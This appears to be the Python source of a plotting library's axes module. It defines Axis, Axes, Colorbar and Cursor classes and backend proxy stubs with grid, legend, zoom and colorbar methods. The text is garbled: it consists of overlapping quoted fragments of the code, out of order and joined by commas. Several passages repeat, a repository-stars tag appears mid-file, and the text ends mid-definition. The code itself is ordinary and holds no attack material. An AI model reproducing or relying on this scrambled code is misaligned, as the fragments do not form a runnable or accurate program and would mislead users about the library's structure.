{id} does not exist in axes {self.axes},\" f\" known plots are {self.plots}\"", "pass @mark_backend_unsupported def enable_minor_grid(self): pass @mark_backend_unsupported def disable_minor_grid(self): pass @mark_backend_unsupported def set_legend(self, legend:", "Position at which the colorbar should be created. location = Enum(\"right\", \"top\", \"left\",", "a colorbar to the axes.\"\"\" if self.colorbar: return self.colorbar = Colorbar(axes=self) if self._resolver:", "#: Colorbar associated with plot if any. colorbar = Typed(Colorbar) #: Set of", "graph cursors = ATuple(Cursor) #: Set of plots currently displayed in the axes", "axes: Tuple[str, str]): # What axis are we linked to pass def remove_cursor(self,", "Display a minor grid minor_grid_enabled = Bool() #: # SHOULD NOT be edited", "plot if any. colorbar = Typed(Colorbar) #: Set of cursors currently active on", "{id} already exist in axes {self}\") axes = plot.axes_mapping if not axes: axes", "axes.\"\"\" if plot.id in self.plots: raise RuntimeError(f\"A plot with {id} already exist in", "in matplotlib an axis is expected to provide way to draw into the", "add_plot(self, plot) -> None: \"\"\"Add a plot to the axes.\"\"\" if plot.id in", "else: raise RuntimeError( f\"The axes used for {[lab for lab, _ in missing]}", "API #: Reference to the backend resolver needed to dynamically add axes _resolver", "axes.\"\"\" self.colorbar.finalize() del self.colorbar def add_line( self, id: str, orientation: str, position: float,", "tick labels tick_labels_font = Dict(str) #: aspect_ratio = Int(20) class Cursor(PlotElement): \"\"\"Cursor on", "the colorbar from the axes.\"\"\" self.colorbar.finalize() del self.colorbar def add_line( self, id: str,", "autoscaled auto_scaling = Bool() #: List of 2 tuple representing a possibly discountinuous", "Any]): pass @mark_backend_unsupported def set_tick_labels(self, labels: Sequence[str], font: Mapping[str, Any]): pass class CursorProxy(PlotElementProxy):", "= Typed(Axis) right_axis = Typed(Axis) top_axis = Typed(Axis) #: Colorbar associated with plot", "displayed in the axes plots = Dict(str, BasePlot) #: Display a major grid", "remove_line(self, id: str) -> None: pass class Axis(PlotElement): \"\"\"Axis of a plot.\"\"\" #:", "@mark_backend_unsupported def remove_plot(self, id): pass @mark_backend_unsupported def add_line( self, id: str, orientation: str,", "axis in data coordinate. #: Setting this values will have an impact only", "set_limits(self, limits): # Limited to axis with no breaks pass @mark_backend_unsupported def set_limits_with_breaks(self,", "Float() # FIXME Add connections to the proxy and a way to prevent", "= Typed(Axis) top_axis = Typed(Axis) #: Colorbar associated with plot if any. colorbar", "str]): # What axis are we linked to pass def remove_cursor(self, index: int):", "if self.colorbar: return self.colorbar = Colorbar(axes=self) if self._resolver: self.colorbar.initialize(self._resolver) def remove_colorbar(self): \"\"\"Remove the", "): pass def remove_line(self, id: str) -> None: pass # FIXME Need to", "axes. figure = ForwardTyped(_resolve_figure) #: Axes composing this object. left_axis = Typed(Axis) bottom_axis", "bounds: Optional[Tuple[float, float]] = None, ): pass @mark_backend_unsupported def remove_line(self, id: str) ->", "API to enable zooming/panning and modifiers # TODO Add the ability to link", "not axes: axes = { \"x\": \"bottom\" if self.bottom_axis else \"top\", \"y\": \"left\"", "representing a possibly discountinuous axis. limits = List(tuple) #: Is the axis direction", "NotImplementedError() @mark_backend_unsupported def set_autoscaling(self, setting: bool): pass @mark_backend_unsupported def set_limits(self, limits): # Limited", "# Limited to axis with no breaks pass @mark_backend_unsupported def set_limits_with_breaks(self, limits): pass", "pa in unknown]}).\" ) else: raise RuntimeError( f\"The axes used for {[lab for", "Distributed under the terms of the BSD license. # # The full license", "# -------------------------------------------------------------------------------------- # Copyright 2020-2021 by Oculy Authors, see git history for more", "the object and the axes.\"\"\" super().initialize(resolver) for axis in (self.left_axis, self.bottom_axis, self.right_axis, self.top_axis):", "minor grid minor_grid_enabled = Bool() #: # SHOULD NOT be edited in place.", "minor_grid_enabled = Bool() #: # SHOULD NOT be edited in place. legends =", "the graph cursors = ATuple(Cursor) #: Set of plots currently displayed in the", "have a resolver if self._resolver: plot.initialize(self._resolver) def remove_plot(self, id): \"\"\"Remove a plot based", "# --- Private API #: Reference to the backend resolver needed to dynamically", "__init__(self, **kwargs): super().__init__(**kwargs) if not self.bottom_axis or self.top_axis: self.bottom_axis = Axis(axes=self) if not", "= Float() #: c_value = Float(float(\"nan\")) # FIXME need to sync to the", "SHOULD NOT be edited in place. legends = Dict(str, str) #: Projection to", "\"x\": \"bottom\" if self.bottom_axis else \"top\", \"y\": \"left\" if self.left_axis else \"right\", }", "axis direction inverted. inverted = Bool() #: Label of the axis label =", "-> None: pass # FIXME Need to define the proper API to enable", "pass @mark_backend_unsupported def disable_panning(self): pass @mark_backend_unsupported def add_axis(self, axes=None): pass @mark_backend_unsupported def remove_axis(self):", "f\"{[ax for ax in axes.axes._fields if axes.axes[ax] is not None]}, \" f\"specified axes", "pass @mark_backend_unsupported def set_projections(self): pass @mark_backend_unsupported def add_cursor( self, axes=None ): # Need", "plots = Dict(str, BasePlot) #: Display a major grid major_grid_enabled = Bool() #:", "used for {[lab for lab, _ in unknown]} do not \" \"correspond to", "for more details. # # Distributed under the terms of the BSD license.", "with the other axis in data coordinate. #: Setting this values will have", "a possibly discountinuous axis. limits = List(tuple) #: Label of the axis label", "= Axis(axes=self) def initialize(self, resolver): \"\"\"Initialize the proxy of the object and the", "axes are \" \"'left', 'right', 'top', 'bottom', provided axes are \" f\"{[pa for", "@mark_backend_unsupported def disable_panning(self): pass @mark_backend_unsupported def add_axis(self, axes=None): pass @mark_backend_unsupported def remove_axis(self): pass", "float, bounds: Optional[Tuple[float, float]] = None, ): pass @mark_backend_unsupported def remove_line(self, id: str)", "orientation: str, position: float, bounds: Optional[Tuple[float, float]] = None, ): pass @mark_backend_unsupported def", "beyond # matplotlib default) # --- Private API #: Reference to the backend", "def add_line( self, id: str, orientation: str, position: float, bounds: Optional[Tuple[float, float]] =", "prevent self recursion # FIXME Add convenience to connect axes between them class", "missing = [] for lab, pa in axes.items(): if pa not in (\"left\",", "to any valid axes (valid axes are \" \"'left', 'right', 'top', 'bottom', provided", "an axis is expected to provide way to draw into the axis and", "self.left_axis or self.right_axis: self.left_axis = Axis(axes=self) def initialize(self, resolver): \"\"\"Initialize the proxy of", "in data coordinate. #: Setting this values will have an impact only if", "{self.axes},\" f\" known plots are {self.plots}\" ) if not self.proxy: raise RuntimeError(f\"Axes {self}", "label label_font = Dict(str) #: Font used for the tick labels tick_labels_font =", "to pass def remove_cursor(self, index: int): pass def add_plot(self, plot) -> None: \"\"\"Add", "#: Reference to the parent axes. axes = ForwardTyped(lambda: Axes) #: Position at", "self.bottom_axis, self.left_axis): axis.finalize() super().finalize() def add_cursor(self, axes: Tuple[str, str]): # What axis are", "a cursor.\"\"\" pass class AxesProxy(PlotElementProxy): \"\"\"Proxy for axes. As in matplotlib an axis", "are \" \"'left', 'right', 'top', 'bottom', provided axes are \" f\"{[pa for _,", "2 active #: axes in the axes_set. intercept = Float() # FIXME Add", "pass @mark_backend_unsupported def set_tick_labels(self, labels: Sequence[str], font: Mapping[str, Any]): pass @mark_backend_unsupported def set_tick_position(self,", "of cursors currently active on the graph cursors = ATuple(Cursor) #: Set of", "Axes composing this object. left_axis = Typed(Axis) bottom_axis = Typed(Axis) right_axis = Typed(Axis)", "#: aspect_ratio = Int(20) class Cursor(PlotElement): \"\"\"Cursor on a plot.\"\"\" #: x_value =", "BasePlot) #: Display a major grid major_grid_enabled = Bool() #: Display a minor", "are only 2 active #: axes in the axes_set. intercept = Float() #", "to the parent axes. axes = ForwardTyped(lambda: Axes) #: Position at which the", "in axes {self}\") axes = plot.axes_mapping if not axes: axes = { \"x\":", "else \"right\", } plot.axes_mapping = axes # Validate the axes supposed to be", "axes supposed to be used. if any( ( pa not in (\"left\", \"bottom\",", "tuple representing a possibly discountinuous axis. limits = List(tuple) #: Label of the", "\"top\"): unknown.append((lab, pa)) elif getattr(axes, f\"{pa}_axis\") is None: missing.append((lab, pa)) if missing: raise", "in (self.top_axis, self.right_axis, self.bottom_axis, self.left_axis): axis.finalize() super().finalize() def add_cursor(self, axes: Tuple[str, str]): #", "enable_panning(self, button: str): pass @mark_backend_unsupported def disable_panning(self): pass @mark_backend_unsupported def add_axis(self, axes=None): pass", "# FIXME Need to define the proper API to enable zooming/panning and modifiers", "labels tick_labels_font = Dict(str) #: aspect_ratio = Int(20) class Cursor(PlotElement): \"\"\"Cursor on a", "able to add more elements #: later on. self._resolver = resolver def finalize(self):", "set_autoscaling(self, setting: bool): pass @mark_backend_unsupported def set_limits(self, limits): # Limited to axis with", "\"left\" if self.left_axis else \"right\", } plot.axes_mapping = axes # Validate the axes", "their associated proxy. \"\"\" from typing import Any, Mapping, Optional, Sequence, Tuple from", "Bool() #: Label of the axis label = Str() #: Tick labels. tick_labels", "edited in place. legends = Dict(str, str) #: Projection to use on the", "figures ie beyond # matplotlib default) # --- Private API #: Reference to", "\"right\", \"top\"): unknown.append((lab, pa)) elif getattr(axes, f\"{pa}_axis\") is None: missing.append((lab, pa)) if missing:", "history for more details. # # Distributed under the terms of the BSD", "Dict(str, str) #: Projection to use on the axes. projection = Enum(\"cartesian\", \"polar\")", "for c in self.cursors: c.backend_name = self.backend_name c.initialize(resolver) for p in self.plots.values(): p.backend_name", "def set_tick_position(self, position: str): pass class ColorbarProxy(PlotElementProxy): \"\"\"Proxy for the colorbar attached to", "pass def remove_cursor(self, index: int): pass def add_plot(self, plot) -> None: \"\"\"Add a", "for lab, pa in axes.items(): if pa not in (\"left\", \"bottom\", \"right\", \"top\"):", "ForwardTyped, Int, List, Str from atom.api import Tuple as ATuple from atom.api import", "the proxy and a way to prevent self recursion # FIXME Add convenience", "Enum(\"cartesian\", \"polar\") def __init__(self, **kwargs): super().__init__(**kwargs) if not self.bottom_axis or self.top_axis: self.bottom_axis =", "to the figure holding the axes. figure = ForwardTyped(_resolve_figure) #: Axes composing this", "add_colorbar(self): \"\"\"Add a colorbar to the axes.\"\"\" if self.colorbar: return self.colorbar = Colorbar(axes=self)", "str, orientation: str, position: float, bounds: Optional[Tuple[float, float]] = None, ): pass def", "= self.backend_name self.colorbar.initialize(resolver) for c in self.cursors: c.backend_name = self.backend_name c.initialize(resolver) for p", "axes are \" f\"{[pa for _, pa in unknown]}).\" ) else: raise RuntimeError(", "plot.initialize(self._resolver) def remove_plot(self, id): \"\"\"Remove a plot based on its ID.\"\"\" if id", "# Copyright 2020-2021 by Oculy Authors, see git history for more details. #", "with this software. # -------------------------------------------------------------------------------------- \"\"\"Axis, axes, colorbar and their associated proxy. \"\"\"", "the axes.\"\"\" super().initialize(resolver) for axis in (self.left_axis, self.bottom_axis, self.right_axis, self.top_axis): if not axis:", "aspect_ratio = Int(20) class Cursor(PlotElement): \"\"\"Cursor on a plot.\"\"\" #: x_value = Float()", "ax in axes.axes._fields if axes.axes[ax] is not None]}, \" f\"specified axes are {[pa", "<gh_stars>0 # -------------------------------------------------------------------------------------- # Copyright 2020-2021 by Oculy Authors, see git history for", "the label label_font = Dict(str) #: Font used for the tick labels tick_labels_font", "ForwardTyped(lambda: Axes) #: Should that axis be autoscaled auto_scaling = Bool() #: List", "AxisProxy(PlotElementProxy): \"\"\"Proxy for a single axis. Handle: - scaling - bounds \"\"\" @mark_backend_unsupported", "if self.colorbar: self.colorbar.backend_name = self.backend_name self.colorbar.initialize(resolver) for c in self.cursors: c.backend_name = self.backend_name", "Optional[Tuple[float, float]] = None, ): pass def remove_line(self, id: str) -> None: pass", "self.plots[id]) def add_colorbar(self): \"\"\"Add a colorbar to the axes.\"\"\" if self.colorbar: return self.colorbar", "@mark_backend_unsupported def set_limits(self, limits): # Limited to axis with no breaks pass @mark_backend_unsupported", "reference to the resolver to be able to add more elements #: later", "active proxy.\") self.proxy.remove_plot(id, self.plots[id]) def add_colorbar(self): \"\"\"Add a colorbar to the axes.\"\"\" if", "float]] = None, ): pass @mark_backend_unsupported def remove_line(self, id: str) -> None: pass", "axes = ForwardTyped(lambda: Axes) #: Should that axis be autoscaled auto_scaling = Bool()", "#: Font used for the tick labels tick_labels_font = Dict(str) #: Intercept position", "for _, pa in missing]}.\" ) # Make sure the plot knows where", "Typed from ..backends.resolver import BackendResolver from .base import BasePlot, PlotElement, PlotElementProxy, mark_backend_unsupported class", "[] for lab, pa in axes.items(): if pa not in (\"left\", \"bottom\", \"right\",", "discountinuous axis. limits = List(tuple) #: Label of the axis label = Str()", "..backends.resolver import BackendResolver from .base import BasePlot, PlotElement, PlotElementProxy, mark_backend_unsupported class AxisProxy(PlotElementProxy): \"\"\"Proxy", "active #: axes in the axes_set. intercept = Float() # FIXME Add connections", "missing: raise RuntimeError( f\"The axes used for {[lab for lab, _ in unknown]}", "it is plotted. plot.axes = self self.plots[plot.id] = plot # Initialize the plot", "software. # -------------------------------------------------------------------------------------- \"\"\"Axis, axes, colorbar and their associated proxy. \"\"\" from typing", "pass @mark_backend_unsupported def add_axis(self, axes=None): pass @mark_backend_unsupported def remove_axis(self): pass @mark_backend_unsupported def set_projections(self):", "plot.\"\"\" #: Reference to the parent axes. axes = ForwardTyped(lambda: Axes) #: Position", "Float() #: y_value = Float() #: c_value = Float(float(\"nan\")) # FIXME need to", "raise KeyError( f\"Plot {id} does not exist in axes {self.axes},\" f\" known plots", "axes (accross different figures ie beyond # matplotlib default) # --- Private API", "c in self.cursors: c.finalize() if self.colorbar: self.colorbar.finalize() for axis in (self.top_axis, self.right_axis, self.bottom_axis,", "self.plots[plot.id] = plot # Initialize the plot if we have a resolver if", "axis in (self.top_axis, self.right_axis, self.bottom_axis, self.left_axis): axis.finalize() super().finalize() def add_cursor(self, axes: Tuple[str, str]):", "Float(float(\"nan\")) # FIXME need to sync to the proxy def _resolve_figure(): from .figure", "pa in missing]}.\" ) # Make sure the plot knows where it is", "c.finalize() if self.colorbar: self.colorbar.finalize() for axis in (self.top_axis, self.right_axis, self.bottom_axis, self.left_axis): axis.finalize() super().finalize()", "2020-2021 by Oculy Authors, see git history for more details. # # Distributed", "= ATuple(Cursor) #: Set of plots currently displayed in the axes plots =", "proxy.\") self.proxy.remove_plot(id, self.plots[id]) def add_colorbar(self): \"\"\"Add a colorbar to the axes.\"\"\" if self.colorbar:", "self.colorbar: return self.colorbar = Colorbar(axes=self) if self._resolver: self.colorbar.initialize(self._resolver) def remove_colorbar(self): \"\"\"Remove the colorbar", "@mark_backend_unsupported def remove_line(self, id: str) -> None: pass class Axis(PlotElement): \"\"\"Axis of a", "used for the tick labels tick_labels_font = Dict(str) #: Intercept position of this", "= Float(float(\"nan\")) # FIXME need to sync to the proxy def _resolve_figure(): from", "more elements #: later on. self._resolver = resolver def finalize(self): \"\"\"Finalize the proxy", "specify to which axes the cursor is bound pass @mark_backend_unsupported def remove_cursor(self): pass", "2 tuple representing a possibly discountinuous axis. limits = List(tuple) #: Label of", "sync to the proxy def _resolve_figure(): from .figure import Figure return Figure class", "Dict(str) #: Intercept position of this axis with the other axis in data", "(self.left_axis, self.bottom_axis, self.right_axis, self.top_axis): if not axis: continue axis.backend_name = self.backend_name axis.initialize(resolver) if", "self._resolver = resolver def finalize(self): \"\"\"Finalize the proxy of the figure.\"\"\" for p", "resolver if self._resolver: plot.initialize(self._resolver) def remove_plot(self, id): \"\"\"Remove a plot based on its", "float]] = None, ): pass def remove_line(self, id: str) -> None: pass #", "the ability to link axes (accross different figures ie beyond # matplotlib default)", "representing a possibly discountinuous axis. limits = List(tuple) #: Label of the axis", "if there are only 2 active #: axes in the axes_set. intercept =", "BasePlot, PlotElement, PlotElementProxy, mark_backend_unsupported class AxisProxy(PlotElementProxy): \"\"\"Proxy for a single axis. Handle: -", "\"\"\" @mark_backend_unsupported def set_axis_scale(self, scale): # lin, log raise NotImplementedError() @mark_backend_unsupported def set_autoscaling(self,", "license is in the file LICENCE, distributed with this software. # -------------------------------------------------------------------------------------- \"\"\"Axis,", "set_limits_with_breaks(self, limits): pass @mark_backend_unsupported def set_label(self, title: str, font: Mapping[str, Any]): pass @mark_backend_unsupported", "Axes) #: Should that axis be autoscaled auto_scaling = Bool() #: List of", "limits = List(tuple) #: Label of the axis label = Str() #: Tick", "pass @mark_backend_unsupported def remove_plot(self, id): pass @mark_backend_unsupported def add_line( self, id: str, orientation:", "@mark_backend_unsupported def remove_axis(self): pass @mark_backend_unsupported def set_projections(self): pass @mark_backend_unsupported def add_cursor( self, axes=None", "axes the cursor is bound pass @mark_backend_unsupported def remove_cursor(self): pass @mark_backend_unsupported def enable_major_grid(self):", "linked to pass def remove_cursor(self, index: int): pass def add_plot(self, plot) -> None:", "\" f\"{[pa for _, pa in unknown]}).\" ) else: raise RuntimeError( f\"The axes", "the axes.\"\"\" self.colorbar.finalize() del self.colorbar def add_line( self, id: str, orientation: str, position:", "enable zooming/panning and modifiers # TODO Add the ability to link axes (accross", "= resolver def finalize(self): \"\"\"Finalize the proxy of the figure.\"\"\" for p in", "#: Position at which the colorbar should be created. location = Enum(\"right\", \"top\",", ".figure import Figure return Figure class Axes(PlotElement): \"\"\"Axes of a plot\"\"\" #: Reference", "@mark_backend_unsupported def enable_major_grid(self): pass @mark_backend_unsupported def disable_major_grid(self): pass @mark_backend_unsupported def enable_minor_grid(self): pass @mark_backend_unsupported", "Str from atom.api import Tuple as ATuple from atom.api import Typed from ..backends.resolver", "import Bool, Dict, Enum, Float, ForwardTyped, Int, List, Str from atom.api import Tuple", "@mark_backend_unsupported def enable_panning(self, button: str): pass @mark_backend_unsupported def disable_panning(self): pass @mark_backend_unsupported def add_axis(self,", "Float, ForwardTyped, Int, List, Str from atom.api import Tuple as ATuple from atom.api", "recursion # FIXME Add convenience to connect axes between them class Colorbar(PlotElement): \"\"\"Colorbar", "Font used for the tick labels tick_labels_font = Dict(str) #: Intercept position of", "axis: continue axis.backend_name = self.backend_name axis.initialize(resolver) if self.colorbar: self.colorbar.backend_name = self.backend_name self.colorbar.initialize(resolver) for", "to be able to add more elements #: later on. self._resolver = resolver", "in self.cursors: c.finalize() if self.colorbar: self.colorbar.finalize() for axis in (self.top_axis, self.right_axis, self.bottom_axis, self.left_axis):", "axes: axes = { \"x\": \"bottom\" if self.bottom_axis else \"top\", \"y\": \"left\" if", "if we have a resolver if self._resolver: plot.initialize(self._resolver) def remove_plot(self, id): \"\"\"Remove a", "the axes_set. intercept = Float() # FIXME Add connections to the proxy and", "set_tick_labels(self, labels: Sequence[str], font: Mapping[str, Any]): pass class CursorProxy(PlotElementProxy): \"\"\"Proxy for a cursor.\"\"\"", "def add_plot(self, plot) -> None: \"\"\"Add a plot to the axes.\"\"\" if plot.id", "for axis in (self.top_axis, self.right_axis, self.bottom_axis, self.left_axis): axis.finalize() super().finalize() def add_cursor(self, axes: Tuple[str,", "= Dict(str) #: Font used for the tick labels tick_labels_font = Dict(str) #:", "self.colorbar.initialize(self._resolver) def remove_colorbar(self): \"\"\"Remove the colorbar from the axes.\"\"\" self.colorbar.finalize() del self.colorbar def", "def set_tick_labels(self, labels: Sequence[str], font: Mapping[str, Any]): pass class CursorProxy(PlotElementProxy): \"\"\"Proxy for a", "state: bool): pass @mark_backend_unsupported def set_label(self, title: str, font: Mapping[str, Any]): pass @mark_backend_unsupported", "Any]): pass @mark_backend_unsupported def set_tick_position(self, position: str): pass class ColorbarProxy(PlotElementProxy): \"\"\"Proxy for the", "axes. projection = Enum(\"cartesian\", \"polar\") def __init__(self, **kwargs): super().__init__(**kwargs) if not self.bottom_axis or", "where it is plotted. plot.axes = self self.plots[plot.id] = plot # Initialize the", "str) -> None: pass # FIXME Need to define the proper API to", "missing]} do not \" \"exist. Existing axes are \" f\"{[ax for ax in", "\"\"\"Axis of a plot.\"\"\" #: Reference to the parent axes. axes = ForwardTyped(lambda:", "{self.plots}\" ) if not self.proxy: raise RuntimeError(f\"Axes {self} does not have an active", "self.top_axis): if not axis: continue axis.backend_name = self.backend_name axis.initialize(resolver) if self.colorbar: self.colorbar.backend_name =", "self, id: str, orientation: str, position: float, bounds: Optional[Tuple[float, float]] = None, ):", "raise RuntimeError(f\"Axes {self} does not have an active proxy.\") self.proxy.remove_plot(id, self.plots[id]) def add_colorbar(self):", "def add_axis(self, axes=None): pass @mark_backend_unsupported def remove_axis(self): pass @mark_backend_unsupported def set_projections(self): pass @mark_backend_unsupported", "limits = List(tuple) #: Is the axis direction inverted. inverted = Bool() #:", "tuple representing a possibly discountinuous axis. limits = List(tuple) #: Is the axis", "raise RuntimeError( f\"The axes used for {[lab for lab, _ in unknown]} do", "to the axes.\"\"\" if plot.id in self.plots: raise RuntimeError(f\"A plot with {id} already", "to the axes.\"\"\" if self.colorbar: return self.colorbar = Colorbar(axes=self) if self._resolver: self.colorbar.initialize(self._resolver) def", "str, position: float, bounds: Optional[Tuple[float, float]] = None, ): pass @mark_backend_unsupported def remove_line(self,", "(self.top_axis, self.right_axis, self.bottom_axis, self.left_axis): axis.finalize() super().finalize() def add_cursor(self, axes: Tuple[str, str]): # What", "are {self.plots}\" ) if not self.proxy: raise RuntimeError(f\"Axes {self} does not have an", "self.plots: raise KeyError( f\"Plot {id} does not exist in axes {self.axes},\" f\" known", "not in (\"left\", \"bottom\", \"right\", \"top\") or getattr(self, f\"{pa}_axis\") is None ) for", "axes, colorbar and their associated proxy. \"\"\" from typing import Any, Mapping, Optional,", "\"\"\"Axes of a plot\"\"\" #: Reference to the figure holding the axes. figure", "on the axes. projection = Enum(\"cartesian\", \"polar\") def __init__(self, **kwargs): super().__init__(**kwargs) if not", "self.plots.values(): p.backend_name = self.backend_name p.initialize(resolver) #: Conserve a reference to the resolver to", "axes = plot.axes_mapping if not axes: axes = { \"x\": \"bottom\" if self.bottom_axis", "is expected to provide way to draw into the axis and way to", "getattr(self, f\"{pa}_axis\") is None ) for pa in axes.values() ): unknown = []", "is bound pass @mark_backend_unsupported def remove_cursor(self): pass @mark_backend_unsupported def enable_major_grid(self): pass @mark_backend_unsupported def", "axes are {[pa for _, pa in missing]}.\" ) # Make sure the", "class Cursor(PlotElement): \"\"\"Cursor on a plot.\"\"\" #: x_value = Float() #: y_value =", "lab, pa in axes.items(): if pa not in (\"left\", \"bottom\", \"right\", \"top\"): unknown.append((lab,", "a colorplot.\"\"\" @mark_backend_unsupported def set_axis_scale(self, scale): # lin, log raise NotImplementedError() @mark_backend_unsupported def", "Any]): pass class CursorProxy(PlotElementProxy): \"\"\"Proxy for a cursor.\"\"\" pass class AxesProxy(PlotElementProxy): \"\"\"Proxy for", "FIXME Add convenience to connect axes between them class Colorbar(PlotElement): \"\"\"Colorbar for a", "them class Colorbar(PlotElement): \"\"\"Colorbar for a 2D plot.\"\"\" #: Reference to the parent", "\"\"\"Colorbar for a 2D plot.\"\"\" #: Reference to the parent axes. axes =", "#: x_value = Float() #: y_value = Float() #: c_value = Float(float(\"nan\")) #", "f\"specified axes are {[pa for _, pa in missing]}.\" ) # Make sure", "= Bool() #: Display a minor grid minor_grid_enabled = Bool() #: # SHOULD", "- bounds \"\"\" @mark_backend_unsupported def set_axis_scale(self, scale): # lin, log raise NotImplementedError() @mark_backend_unsupported", "{[pa for _, pa in missing]}.\" ) # Make sure the plot knows", "None, ): pass def remove_line(self, id: str) -> None: pass # FIXME Need", "Dict(str) #: Font used for the tick labels tick_labels_font = Dict(str) #: Intercept", "a plot.\"\"\" #: x_value = Float() #: y_value = Float() #: c_value =", "self.right_axis: self.left_axis = Axis(axes=self) def initialize(self, resolver): \"\"\"Initialize the proxy of the object", "@mark_backend_unsupported def remove_cursor(self): pass @mark_backend_unsupported def enable_major_grid(self): pass @mark_backend_unsupported def disable_major_grid(self): pass @mark_backend_unsupported", "which the colorbar should be created. location = Enum(\"right\", \"top\", \"left\", \"bottom\") #:", "if any( ( pa not in (\"left\", \"bottom\", \"right\", \"top\") or getattr(self, f\"{pa}_axis\")", "# Initialize the plot if we have a resolver if self._resolver: plot.initialize(self._resolver) def", "pass # FIXME Need to define the proper API to enable zooming/panning and", "axes_set. intercept = Float() # FIXME Add connections to the proxy and a", "for the tick labels tick_labels_font = Dict(str) #: Intercept position of this axis", "add more elements #: later on. self._resolver = resolver def finalize(self): \"\"\"Finalize the", "parent axes. axes = ForwardTyped(lambda: Axes) #: Should that axis be autoscaled auto_scaling", "from typing import Any, Mapping, Optional, Sequence, Tuple from atom.api import Bool, Dict,", "add_cursor(self, axes: Tuple[str, str]): # What axis are we linked to pass def", "are {[pa for _, pa in missing]}.\" ) # Make sure the plot", "typing import Any, Mapping, Optional, Sequence, Tuple from atom.api import Bool, Dict, Enum,", "Tick labels. tick_labels = List(str) #: Font used for the label label_font =", "p in self.plots.values(): p.finalize() for c in self.cursors: c.finalize() if self.colorbar: self.colorbar.finalize() for", "{ \"x\": \"bottom\" if self.bottom_axis else \"top\", \"y\": \"left\" if self.left_axis else \"right\",", ") # Make sure the plot knows where it is plotted. plot.axes =", "in self.plots.values(): p.finalize() for c in self.cursors: c.finalize() if self.colorbar: self.colorbar.finalize() for axis", ") else: raise RuntimeError( f\"The axes used for {[lab for lab, _ in", "@mark_backend_unsupported def set_legend(self, legend: Mapping[str, str]): pass @mark_backend_unsupported def remove_plot(self, id): pass @mark_backend_unsupported", "\"\"\"Initialize the proxy of the object and the axes.\"\"\" super().initialize(resolver) for axis in", "with no breaks pass @mark_backend_unsupported def set_limits_with_breaks(self, limits): pass @mark_backend_unsupported def invert_axis(self, state:", "def set_axis_scale(self, scale): # lin, log raise NotImplementedError() @mark_backend_unsupported def set_autoscaling(self, setting: bool):", "finalize(self): \"\"\"Finalize the proxy of the figure.\"\"\" for p in self.plots.values(): p.finalize() for", "#: # SHOULD NOT be edited in place. legends = Dict(str, str) #:", "initialize(self, resolver): \"\"\"Initialize the proxy of the object and the axes.\"\"\" super().initialize(resolver) for", "not exist in axes {self.axes},\" f\" known plots are {self.plots}\" ) if not", "that axis be autoscaled auto_scaling = Bool() #: List of 2 tuple representing", "the tick labels tick_labels_font = Dict(str) #: Intercept position of this axis with", "def set_tick_labels(self, labels: Sequence[str], font: Mapping[str, Any]): pass @mark_backend_unsupported def set_tick_position(self, position: str):", "axes.\"\"\" if self.colorbar: return self.colorbar = Colorbar(axes=self) if self._resolver: self.colorbar.initialize(self._resolver) def remove_colorbar(self): \"\"\"Remove", "axis are we linked to pass def remove_cursor(self, index: int): pass def add_plot(self,", "#: Reference to the backend resolver needed to dynamically add axes _resolver =", "cursor.\"\"\" pass class AxesProxy(PlotElementProxy): \"\"\"Proxy for axes. As in matplotlib an axis is", "colorbar attached to a colorplot.\"\"\" @mark_backend_unsupported def set_axis_scale(self, scale): # lin, log raise", "axis is expected to provide way to draw into the axis and way", "label_font = Dict(str) #: Font used for the tick labels tick_labels_font = Dict(str)", "to use on the axes. projection = Enum(\"cartesian\", \"polar\") def __init__(self, **kwargs): super().__init__(**kwargs)", "Add connections to the proxy and a way to prevent self recursion #", "axes. axes = ForwardTyped(lambda: Axes) #: Position at which the colorbar should be", "pass @mark_backend_unsupported def set_limits_with_breaks(self, limits): pass @mark_backend_unsupported def invert_axis(self, state: bool): pass @mark_backend_unsupported", "set_axis_scale(self, scale): # lin, log raise NotImplementedError() @mark_backend_unsupported def set_autoscaling(self, setting: bool): pass", "composing this object. left_axis = Typed(Axis) bottom_axis = Typed(Axis) right_axis = Typed(Axis) top_axis", "ID.\"\"\" if id not in self.plots: raise KeyError( f\"Plot {id} does not exist", "#: Is the axis direction inverted. inverted = Bool() #: Label of the", "the axes.\"\"\" if self.colorbar: return self.colorbar = Colorbar(axes=self) if self._resolver: self.colorbar.initialize(self._resolver) def remove_colorbar(self):", "matplotlib an axis is expected to provide way to draw into the axis", "pass @mark_backend_unsupported def remove_cursor(self): pass @mark_backend_unsupported def enable_major_grid(self): pass @mark_backend_unsupported def disable_major_grid(self): pass", "c.initialize(resolver) for p in self.plots.values(): p.backend_name = self.backend_name p.initialize(resolver) #: Conserve a reference", "[] missing = [] for lab, pa in axes.items(): if pa not in", "discountinuous axis. limits = List(tuple) #: Is the axis direction inverted. inverted =", "Limited to axis with no breaks pass @mark_backend_unsupported def set_limits_with_breaks(self, limits): pass @mark_backend_unsupported", "axes (valid axes are \" \"'left', 'right', 'top', 'bottom', provided axes are \"", "Mapping[str, Any]): pass @mark_backend_unsupported def set_tick_labels(self, labels: Sequence[str], font: Mapping[str, Any]): pass class", "missing.append((lab, pa)) if missing: raise RuntimeError( f\"The axes used for {[lab for lab,", "tick_labels_font = Dict(str) #: Intercept position of this axis with the other axis", "_ in unknown]} do not \" \"correspond to any valid axes (valid axes", "remove_cursor(self): pass @mark_backend_unsupported def enable_major_grid(self): pass @mark_backend_unsupported def disable_major_grid(self): pass @mark_backend_unsupported def enable_minor_grid(self):", "_, pa in missing]}.\" ) # Make sure the plot knows where it", "import Typed from ..backends.resolver import BackendResolver from .base import BasePlot, PlotElement, PlotElementProxy, mark_backend_unsupported", "Any, Mapping, Optional, Sequence, Tuple from atom.api import Bool, Dict, Enum, Float, ForwardTyped,", "major_grid_enabled = Bool() #: Display a minor grid minor_grid_enabled = Bool() #: #", "way to prevent self recursion # FIXME Add convenience to connect axes between", "# Make sure the plot knows where it is plotted. plot.axes = self", "the axis appearance. \"\"\" @mark_backend_unsupported def enable_zooming(self, bound: str, button: str): pass @mark_backend_unsupported", "str, orientation: str, position: float, bounds: Optional[Tuple[float, float]] = None, ): pass @mark_backend_unsupported", "disable_panning(self): pass @mark_backend_unsupported def add_axis(self, axes=None): pass @mark_backend_unsupported def remove_axis(self): pass @mark_backend_unsupported def", "Axis(axes=self) if not self.left_axis or self.right_axis: self.left_axis = Axis(axes=self) def initialize(self, resolver): \"\"\"Initialize", "plots currently displayed in the axes plots = Dict(str, BasePlot) #: Display a", "add_axis(self, axes=None): pass @mark_backend_unsupported def remove_axis(self): pass @mark_backend_unsupported def set_projections(self): pass @mark_backend_unsupported def", "id: str) -> None: pass # FIXME Need to define the proper API", "pass @mark_backend_unsupported def 